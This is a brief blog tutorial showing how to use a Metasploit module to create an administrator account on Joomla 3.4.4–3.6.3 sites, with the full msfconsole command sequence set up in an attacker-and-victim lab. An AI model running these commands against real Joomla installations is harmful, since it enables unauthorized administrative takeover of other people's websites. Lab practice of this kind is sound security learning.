Exploiting Joomla using Account Creation and Privilege Escalation

In this article we will learn about hacking Joomla CMS. And to so we will be a pre-instaled module of metasploit which will further help us to create an autocratic account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. Ttherefore, if an email server is arranged in Joomla, an email will be sent to activate the account (the account is disabled by default).

 Exploit Targets

Joomla 3.4.4 through 3.6.3


Attacker: kali Linux

Victim PC: Joomla 3.4.4

Open terminal in Kali and type msfconsole to start metasploit.

Once metasploit is opened then type the following commands to execute the attack:

use auxiliary/admin/http/joomla_registration_privsec

msf exploit (joomla_registration_privsec)>set rhost

msf exploit (joomla_registration_privsec)>set username raj

msf exploit (joomla_registration_privsec)>set password raj123

msf exploit (joomla_registration_privsec)>set email [email protected]

msf exploit (joomla_registration_privsec)>set targeturi /joomla

msf exploit (joomla_registration_privsec)>exploit 

Performing this attack will allow you to create a desirable username and password like in this case I have given username :  raj and password : raj123 along with email ID : [email protected]

In the image below you can see that a new user will be created by the username and passwords that you provided.

And as you have created a username you can log in using the said username.

Thus, you can hack Joomla CMS in the most simplest of the way.

1 Comment Exploiting Joomla using Account Creation and Privilege Escalation

Leave a Reply

Your email address will not be published. Required fields are marked *